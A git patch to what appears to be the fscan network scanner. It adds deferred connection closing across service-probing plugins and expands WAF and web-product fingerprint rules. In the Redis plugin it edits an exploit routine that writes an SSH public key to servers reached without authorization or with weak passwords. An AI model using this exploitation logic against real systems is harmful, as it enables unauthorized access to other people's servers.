From d5665f03d649bd26501ccd08638a1ff32cfd68b9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=BD=B1=E8=88=9E=E8=80=85?= <shadow1ng@qq.com>
Date: Fri, 10 Sep 2021 20:32:51 +0800
Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=8C=87=E7=BA=B9=E3=80=81?=
 =?UTF-8?q?=E4=BC=98=E5=8C=96=E5=86=85=E5=AD=98=E5=8D=A0=E7=94=A8?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 Plugins/CVE-2020-0796.go                      |   6 +-
 Plugins/NetBIOS.go                            |  12 +-
 Plugins/fcgiscan.go                           |   5 +
 Plugins/findnet.go                            |   6 +-
 Plugins/icmp.go                               |  12 +-
 Plugins/memcached.go                          |   6 +-
 Plugins/mongodb.go                            |   6 +-
 Plugins/ms17017.go                            |   7 +-
 Plugins/portscan.go                           |  10 +-
 Plugins/redis.go                              |  42 +++--
 Plugins/smb.go                                |   3 +-
 Plugins/webtitle.go                           |  11 +-
 WebScan/info/rules.go                         | 154 ++++++++++++++++--
 WebScan/pocs/atlassian-confluence-rce.yml     |  17 ++
 WebScan/pocs/seeyon-oa-cookie-leak.yml        |  16 ++
 ...ology-sqli.yml => weaver-ecology-sqli.yml} |   0
 ...i.yml => weaver-ecology-validate-sqli.yml} |   0
 ...> weaver-ecology-workflowservicexml-2.yml} |   0
 ... => weaver-ecology-workflowservicexml.yml} |   0
 ...ole-weak.yml => weblogic-console-weak.yml} |   0
 20 files changed, 265 insertions(+), 48 deletions(-)
 create mode 100644 WebScan/pocs/atlassian-confluence-rce.yml
 create mode 100644 WebScan/pocs/seeyon-oa-cookie-leak.yml
 rename WebScan/pocs/{ecology-sqli.yml => weaver-ecology-sqli.yml} (100%)
 rename WebScan/pocs/{ecology-validate-sqli.yml => weaver-ecology-validate-sqli.yml} (100%)
 rename WebScan/pocs/{ecology-workflowservicexml-2.yml => weaver-ecology-workflowservicexml-2.yml} (100%)
 rename WebScan/pocs/{ecology-workflowservicexml.yml => weaver-ecology-workflowservicexml.yml} (100%)
 rename WebScan/pocs/{poc-yaml-weblogic-console-weak.yml => weblogic-console-weak.yml} (100%)

diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go
index ee921aa..b63404b 100644
--- a/Plugins/CVE-2020-0796.go
+++ b/Plugins/CVE-2020-0796.go
@@ -104,6 +104,11 @@ func SmbGhostScan(info *common.HostInfo) error {
 	ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
 	addr := fmt.Sprintf("%s:%v", info.Host, port)
 	conn, err := net.DialTimeout("tcp", addr, timeout)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
@@ -117,7 +122,6 @@ func SmbGhostScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	if bytes.Contains(buff[:n], []byte("Public")) == true {
 		result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
 		common.LogSuccess(result)
diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go
index da93638..f99e17b 100644
--- a/Plugins/NetBIOS.go
+++ b/Plugins/NetBIOS.go
@@ -76,6 +76,11 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 	}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return
 	}
@@ -83,7 +88,6 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
 	if err != nil {
 		return
 	}
-	defer conn.Close()
 
 	if info.Ports == "139" && len(payload0) > 0 {
 		_, err1 := conn.Write(payload0)
@@ -191,6 +195,11 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
 	realhost := fmt.Sprintf("%s:%v", info.Host, 137)
 	conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return
 	}
@@ -198,7 +207,6 @@ func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
 	if err != nil {
 		return
 	}
-	defer conn.Close()
 	_, err = conn.Write(senddata1)
 	if err != nil {
 		return
diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go
index 9866af3..202eed7 100644
--- a/Plugins/fcgiscan.go
+++ b/Plugins/fcgiscan.go
@@ -53,6 +53,11 @@ func FcgiScan(info *common.HostInfo) {
 	}
 
 	fcgi, err := New(addr, info.Timeout)
+	defer func() {
+		if fcgi.rwc != nil{
+			fcgi.rwc.Close()
+		}
+	}()
 	if err != nil {
 		errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
 		common.LogError(errlog)
diff --git a/Plugins/findnet.go b/Plugins/findnet.go
index ce158da..d9a1e80 100644
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -24,6 +24,11 @@ func Findnet(info *common.HostInfo) error {
 func FindnetScan(info *common.HostInfo) error {
 	realhost := fmt.Sprintf("%s:%v", info.Host, 135)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return err
 	}
@@ -31,7 +36,6 @@ func FindnetScan(info *common.HostInfo) error {
 	if err != nil {
 		return err
 	}
-	defer conn.Close()
 	_, err = conn.Write(bufferV1)
 	if err != nil {
 		return err
diff --git a/Plugins/icmp.go b/Plugins/icmp.go
index d15e385..540ac98 100644
--- a/Plugins/icmp.go
+++ b/Plugins/icmp.go
@@ -51,8 +51,12 @@ func ICMPRun(hostslist []string, Ping bool) []string {
 			common.LogError(err)
 			//尝试无监听icmp探测
 			conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
+			defer func() {
+				if conn != nil{
+					conn.Close()
+				}
+			}()
 			if err == nil {
-				go conn.Close()
 				RunIcmp2(hostslist, chanHosts)
 			} else {
 				common.LogError(err)
@@ -138,10 +142,14 @@ func RunIcmp2(hostslist []string, chanHosts chan string) {
 func icmpalive(host string) bool {
 	startTime := time.Now()
 	conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return false
 	}
-	defer conn.Close()
 	if err := conn.SetDeadline(startTime.Add(6 * time.Second)); err != nil {
 		return false
 	}
diff --git a/Plugins/memcached.go b/Plugins/memcached.go
index af776ee..d4dfe7a 100644
--- a/Plugins/memcached.go
+++ b/Plugins/memcached.go
@@ -11,6 +11,11 @@ import (
 func MemcachedScan(info *common.HostInfo) (err error) {
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	client, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if client != nil{
+			client.Close()
+		}
+	}()
 	if err == nil {
 		err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 		if err == nil {
@@ -23,7 +28,6 @@ func MemcachedScan(info *common.HostInfo) (err error) {
 						result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
 						common.LogSuccess(result)
 					}
-					client.Close()
 				} else {
 					errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
 					common.LogError(errlog)
diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go
index 03aa443..819c02b 100644
--- a/Plugins/mongodb.go
+++ b/Plugins/mongodb.go
@@ -24,10 +24,14 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
 	getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
 	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
 	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout)*time.Second))
 	if err != nil {
 		return flag, err
diff --git a/Plugins/ms17017.go b/Plugins/ms17017.go
index 61ccf8e..2b71949 100644
--- a/Plugins/ms17017.go
+++ b/Plugins/ms17017.go
@@ -29,15 +29,18 @@ func MS17010(info *common.HostInfo) error {
 }
 
 func MS17010Scan(info *common.HostInfo) error {
-
 	ip := info.Host
 	// connecting to a host in LAN if reachable should be very quick
 	conn, err := net.DialTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
 		return err
 	}
-	defer conn.Close()
 	err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
 	if err != nil {
 		//fmt.Printf("failed to connect to %s\n", ip)
diff --git a/Plugins/portscan.go b/Plugins/portscan.go
index 982d858..f84f41c 100644
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -71,13 +71,17 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 
 func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
 	host, port := addr.ip, addr.port
-	con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+	conn, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+	defer func() {
+		if conn != nil{
+			conn.Close()
+		}
+	}()
 	if err == nil {
-		con.Close()
 		address := host + ":" + strconv.Itoa(port)
 		result := fmt.Sprintf("%s open", address)
 		common.LogSuccess(result)
-		respondingHosts <- address
 		wg.Add(1)
+		respondingHosts <- address
 	}
 }
diff --git a/Plugins/redis.go b/Plugins/redis.go
index c9752ff..c94dbde 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -10,6 +10,11 @@ import (
 	"time"
 )
 
+var (
+	dbfilename   string
+	dir          string
+)
+
 func RedisScan(info *common.HostInfo) (tmperr error) {
 	starttime := time.Now().Unix()
 	flag, err := RedisUnauth(info)
@@ -57,9 +62,16 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "+OK") {
-		result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
-		common.LogSuccess(result)
 		flag = true
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
+			common.LogSuccess(result)
+			return flag,err
+		}else {
+			result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename)
+			common.LogSuccess(result)
+		}
 		err = Expoilt(realhost, conn)
 	}
 	return flag, err
@@ -86,19 +98,22 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "redis_version") {
-		result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
-		common.LogSuccess(result)
 		flag = true
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
+			common.LogSuccess(result)
+			return flag,err
+		}else {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost,dir,dbfilename)
+			common.LogSuccess(result)
+		}
 		err = Expoilt(realhost, conn)
 	}
 	return flag, err
 }
 
 func Expoilt(realhost string, conn net.Conn) error {
-	dbfilename, dir, err := getconfig(conn)
-	if err != nil {
-		return err
-	}
 	flagSsh, flagCron, err := testwrite(conn)
 	if err != nil {
 		return err
@@ -116,7 +131,7 @@ func Expoilt(realhost string, conn net.Conn) error {
 				result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
-				fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
+				fmt.Println("[-] Redis:", realhost, "SSHPUB write failed", text)
 			}
 		}
 	}
@@ -268,14 +283,15 @@ func Readfile(filename string) (string, error) {
 }
 
 func readreply(conn net.Conn) (result string, err error) {
-	buf := make([]byte, 4096)
+	size := 5 * 1024
+	buf := make([]byte, size)
 	for {
 		count, err := conn.Read(buf)
 		if err != nil {
 			break
 		}
 		result += string(buf[0:count])
-		if count < 4096 {
+		if count < size {
 			break
 		}
 	}
@@ -318,7 +334,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 	if err != nil {
 		return
 	}
-	text1 := strings.Split(text, "\n")
+	text1 := strings.Split(text, "\r\n")
 	if len(text1) > 2 {
 		dbfilename = text1[len(text1)-2]
 	} else {
@@ -332,7 +348,7 @@ func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
 	if err != nil {
 		return
 	}
-	text1 = strings.Split(text, "\n")
+	text1 = strings.Split(text, "\r\n")
 	if len(text1) > 2 {
 		dir = text1[len(text1)-2]
 	} else {
diff --git a/Plugins/smb.go b/Plugins/smb.go
index 4ea2858..2bf1954 100644
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -1,6 +1,7 @@
 package Plugins
 
 import (
+	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
 	"github.com/stacktitan/smb/smb"
@@ -72,6 +73,6 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
 	case <-signal:
 		return flag, err
 	case <-time.After(time.Duration(info.Timeout) * time.Second):
-		return false, err
+		return false,errors.New("time out")
 	}
 }
diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go
index d4b0f78..2d8f0c7 100644
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -8,7 +8,6 @@ import (
 	"github.com/shadow1ng/fscan/WebScan"
 	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
-	"golang.org/x/net/html/charset"
 	"golang.org/x/text/encoding/simplifiedchinese"
 	"golang.org/x/text/transform"
 	"io"
@@ -56,6 +55,7 @@ func GOWebTitle(info *common.HostInfo) error {
 	if err != nil && !strings.Contains(err.Error(), "EOF") {
 		return err
 	}
+
 	if strings.Contains(result, "://") {
 		//有跳转
 		redirecturl, err := url.Parse(result)
@@ -174,14 +174,14 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 						return ""
 					}
 					encode := GetEncoding()
-					_, encode1, _ := charset.DetermineEncoding(body, "")
+					//_, encode1, _ := charset.DetermineEncoding(body, "")
 					var encode2 string
 					detector := chardet.NewTextDetector()
 					detectorstr, _ := detector.DetectBest(body)
 					if detectorstr != nil {
 						encode2 = detectorstr.Charset
 					}
-					if encode == "gbk" || encode == "gb2312" || encode1 == "gbk" || strings.Contains(strings.ToLower(encode2), "gb") {
+					if encode == "gbk" || encode == "gb2312" ||  strings.Contains(strings.ToLower(encode2), "gb") {
 						titleGBK, err := Decodegbk(text)
 						if err == nil {
 							title = string(titleGBK)
@@ -204,9 +204,9 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er
 				}
 				length := resp.Header.Get("Content-Length")
 				if length == "" {
-					length = fmt.Sprintf("%v", len(text))
+					length = fmt.Sprintf("%v", len(body))
 				}
-				result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", Url, resp.StatusCode, length, title)
+				result := fmt.Sprintf("[*] WebTitle:%-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title)
 				common.LogSuccess(result)
 			}
 			CheckData = append(CheckData, WebScan.CheckDatas{body, fmt.Sprintf("%s", resp.Header)})
@@ -258,7 +258,6 @@ func getRespBody(oResp *http.Response) ([]byte, error) {
 		if err != nil {
 			return nil, err
 		}
-		defer oResp.Body.Close()
 		body = raw
 	}
 	return body, nil
diff --git a/WebScan/info/rules.go b/WebScan/info/rules.go
index 5a7e992..e7b3a76 100644
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -17,11 +17,49 @@ type PocData struct {
 }
 
 var RuleDatas = []RuleData{
+	{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
+	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
+	{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
+	{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
+	{"绿盟防火墙", "code", "(NSFOCUS NF)"},
+	{"绿盟防火墙", "headers", "(NSFocus)"},
+	{"Topsec-Waf", "index", `(<META NAME="Copyright" CONTENT="Topsec Network Security Technology Co.,Ltd"/>","<META NAME="DESCRIPTION" CONTENT="Topsec web UI"/>)`},
+	{"Anquanbao", "headers", "(Anquanbao)"},
+	{"BaiduYunjiasu", "headers", "(yunjiasu)"},
+	{"BigIP", "headers", "(BigIP|BIGipServer)"},
+	{"BinarySEC", "headers", "(binarysec)"},
+	{"BlockDoS", "headers", "(BlockDos.net)"},
+	{"CloudFlare", "headers", "(cloudflare)"},
+	{"Cloudfront", "headers", "(cloudfront)"},
+	{"Comodo", "headers", "(Protected by COMODO)"},
+	{"IBM-DataPower", "headers", "(X-Backside-Transport)"},
+	{"DenyAll", "headers", "(sessioncookie=)"},
+	{"dotDefender", "headers", "(dotDefender)"},
+	{"Incapsula", "headers", "(X-CDN|Incapsula)"},
+	{"Jiasule", "headers", "(jsluid=)"},
+	{"KONA", "headers", "(AkamaiGHost)"},
+	{"ModSecurity", "headers", "(Mod_Security|NOYB)"},
+	{"NetContinuum", "headers", "(Cneonction|nnCoection|citrix_ns_id)"},
+	{"Newdefend", "headers", "(newdefend)"},
+	{"Safe3", "headers", "(Safe3WAF|Safe3 Web Firewall)"},
+	{"Safedog", "code", "(404.safedog.cn/images/safedogsite/broswer_logo.jpg)"},
+	{"Safedog", "headers", "(Safedog|WAF/2.0)"},
+	{"SonicWALL", "headers", "(SonicWALL)"},
+	{"Stingray", "headers", "(X-Mapping-)"},
+	{"Sucuri", "headers", "(Sucuri/Cloudproxy)"},
+	{"Usp-Sec", "headers", "(Secure Entry Server)"},
+	{"Varnish", "headers", "(varnish)"},
+	{"Wallarm", "headers", "(wallarm)"},
+	{"阿里云", "code", "(errors.aliyun.com)"},
+	{"WebKnight", "headers", "(WebKnight)"},
+	{"Yundun", "headers", "(YUNDUN)"},
+	{"Yunsuo", "headers", "(yunsuo)"},
+	{"Coding pages", "header", "(Coding Pages)"},
+	{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"},
 	{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
 	{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
 	{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
 	{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
-	{"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
 	{"Nexus", "code", "(Nexus Repository Manager)"},
 	{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
 	{"Harbor", "code", "(<title>Harbor</title>)"},
@@ -32,11 +70,9 @@ var RuleDatas = []RuleData{
 	{"协众OA", "cookie", "(CNOAOASESSID)"},
 	{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
 	{"atmail-WebMail", "cookie", "(atmail6)"},
-	{"atmail-WebMail", "code", "(Powered by Atmail)"},
-	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
+	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
 	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
-	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
-	{"致远OA", "code", "(/seeyon/common/)"},
+	{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
 	{"discuz", "code", "(content=\"Discuz! X\")"},
 	{"Typecho", "code", "(Typecho</a>)"},
 	{"金蝶EAS", "code", "(easSessionId)"},
@@ -56,7 +92,7 @@ var RuleDatas = []RuleData{
 	{"万户网络", "code", "(css/css_whir.css)"},
 	{"Spark_Master", "code", "(Spark Master at)"},
 	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
-	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
 	{"深信服ssl-vpn", "code", "(login_psw.csp)"},
 	{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
 	{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@@ -95,7 +131,6 @@ var RuleDatas = []RuleData{
 	{"exchange", "code", "(/owa/auth.owa)"},
 	{"Spark_Worker", "code", "(Spark Worker at)"},
 	{"H3C ER3108G", "code", "(ER3108G系统管理)"},
-	{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
 	{"Citrix-ConfProxy", "code", "(confproxy)"},
 	{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
 	{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
@@ -106,7 +141,6 @@ var RuleDatas = []RuleData{
 	{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
 	{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
 	{"H3C ER2100", "code", "(ER2100系统管理)"},
-	{"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
 	{"jira", "code", "(jira.webresources)"},
 	{"金和协同管理平台", "code", "(金和协同管理平台)"},
 	{"Citrix-NetScaler", "code", "(NS-CACHE)"},
@@ -120,7 +154,7 @@ var RuleDatas = []RuleData{
 	{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
 	{"Jboss", "headers", "(JBoss)"},
 	{"泛微E-mobile", "code", "(Weaver E-mobile|weaver,e-mobile)"},
-	{"泛微E-Mobile", "headers", "(EMobileServer)"},
+	{"泛微E-mobile", "headers", "(EMobileServer)"},
 	{"齐治堡垒机", "code", "(logo-icon-ico72.png|resources/themes/images/logo-login.png)"},
 	{"ThinkPHP", "headers", "(ThinkPHP)"},
 	{"ThinkPHP", "code", "(/Public/static/js/)"},
@@ -137,18 +171,97 @@ var RuleDatas = []RuleData{
 	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
 	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
 	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
-	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"用友", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
 	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
 	{"Hadoop Applications", "code", "(/cluster/app/application)"},
-	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
 	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
+	{"帆软报表", "code", "(WebReport/login.html|ReportServer)"},
+	{"帆软报表", "headers", "(数据决策系统)"},
+	{"华夏ERP", "headers", "(华夏ERP)"},
+	{"金和OA", "cookie", "(ASPSESSIONIDSSCDTDBS)"},
+	{"久其财务报表", "code", "(netrep/login.jsp|/netrep/intf)"},
+	{"若依管理系统", "code", "(ruoyi/login.js|ruoyi/js/ry-ui.js)"},
+	{"启莱OA", "code", "(js/jQselect.js|js/jquery-1.4.2.min.js)"},
+	{"智慧校园管理系统", "code", "(DC_Login/QYSignUp)"},
+	{"JQuery-1.7.2", "code", "(webui/js/jquerylib/jquery-1.7.2.min.js)"},
+	{"浪潮 ClusterEngineV4.0", "code", "(0;url=module/login/login.html)"},
+	{"会捷通云视讯平台", "code", "(him/api/rest/v1.0/node/role|him.app)"},
+	{"源码泄露账号密码 F12查看", "code", "(get_dkey_passwd)"},
+	{"Smartbi Insight", "code", "(smartbi.gcf.gcfutil)"},
+	{"汉王人脸考勤管理系统", "code", "(汉王人脸考勤管理系统|/Content/image/hanvan.png|/Content/image/hvicon.ico)"},
+	{"亿赛通-电子文档安全管理系统", "code", "(电子文档安全管理系统|/CDGServer3/index.jsp|/CDGServer3/SysConfig.jsp|/CDGServer3/help/getEditionInfo.jsp)"},
+	{"天融信 TopApp-LB 负载均衡系统", "code", "(TopApp-LB 负载均衡系统)"},
+	{"中新金盾信息安全管理系统", "code", "(中新金盾信息安全管理系统|中新网络信息安全股份有限公司)"},
+	{"好视通", "code", "(深圳银澎云计算有限公司|itunes.apple.com/us/app/id549407870|hao-shi-tong-yun-hui-yi-yuan)"},
+	{"蓝海卓越计费管理系统", "code", "(蓝海卓越计费管理系统|星锐蓝海网络科技有限公司)"},
+	{"和信创天云桌面系统", "code", "(和信下一代云桌面VENGD|/vesystem/index.php)"},
+	{"金山", "code", "(北京猎鹰安全科技有限公司|金山终端安全系统V9.0Web控制台|北京金山安全管理系统技术有限公司|金山V8)"},
+	{"WIFISKY-7层流控路由器", "code", "(深圳市领空技术有限公司|WIFISKY 7层流控路由器)"},
+	{"MetInfo-米拓建站", "code", "(MetInfo|/skin/style/metinfo.css|/skin/style/metinfo-v2.css)"},
+	{"IBM-Lotus-Domino", "code", "(/mailjump.nsf|/domcfg.nsf|/names.nsf|/homepage.nsf)"},
+	{"APACHE-kylin", "code", "(url=kylin)"},
+	{"C-Lodop打印服务系统", "code", "(/CLodopfuncs.js|www.c-lodop.com)"},
+	{"ATLASSIAN-Confluence", "code", "(Atlassian Confluence)"},
+	{"HFS", "code", "(href=\"http://www.rejetto.com/hfs/)"},
+	{"Jellyfin", "code", "(content=\"http://jellyfin.org\")"},
+	{"FIT2CLOUD-JumpServer-堡垒机", "code", "(<title>JumpServer</title>)"},
+	{"Alibaba Nacos", "code", "(<title>Nacos</title>)"},
+	{"Nagios", "headers", "(nagios admin)"},
+	{"Pulse Connect Secure", "code", "(/dana-na/imgs/space.gif)"},
+	{"h5ai", "code", "(powered by h5ai)"},
+	{"jeesite", "cookie", "(jeesite.session.id)"},
+	{"拓尔思SSO", "cookie", "(trsidsssosessionid)"},
+	{"拓尔思WCMv7/6", "cookie", "(com.trs.idm.coSessionId)"},
+	{"天融信脆弱性扫描与管理系统", "code", "(/js/report/horizontalReportPanel.js)"},
+	{"天融信网络审计系统", "code", "(onclick=dlg_download())"},
+	{"天融信日志收集与分析系统", "code", "(天融信日志收集与分析系统)"},
+	{"URP教务系统", "code", "(北京清元优软科技有限公司)"},
+	{"科来RAS", "code", "(科来软件 版权所有|i18ninit.min.js)"},
+	{"正方OA", "code", "(zfoausername)"},
+	{"希尔OA", "code", "(/heeroa/login.do)"},
+	{"泛普建筑工程施工OA", "code", "(/dwr/interface/LoginService.js)"},
+	{"中望OA", "code", "(/IMAGES/default/first/xtoa_logo.png|/app_qjuserinfo/qjuserinfoadd.jsp)"},
+	{"海天OA", "code", "(HTVOS.js)"},
+	{"信达OA", "code", "(http://www.xdoa.cn</a>)"},
+	{"任我行CRM", "code", "(CRM_LASTLOGINUSERKEY)"},
+	{"Spammark邮件信息安全网关", "code", "(/cgi-bin/spammark?empty=1)"},
+	{"winwebmail", "code", "(WinWebMail Server|images/owin.css)"},
+	{"浪潮政务系统", "code", "(LangChao.ECGAP.OutPortal|OnlineQuery/QueryList.aspx)"},
+	{"天融信防火墙", "code", "(/cgi/maincgi.cgi)"},
+	{"网神防火墙", "code", "(css/lsec/login.css)"},
+	{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
+	{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
+	{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
+	{"coremail","code","(/coremail/bundle/|contextRoot: \"/coremail\")"},
+	{"activemq","code","(activemq_logo|Manage ActiveMQ broker)"},
+	{"锐捷网络","code","(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
+	{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
+	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
+	{"weblogic", "headers", "(WebLogic)"},
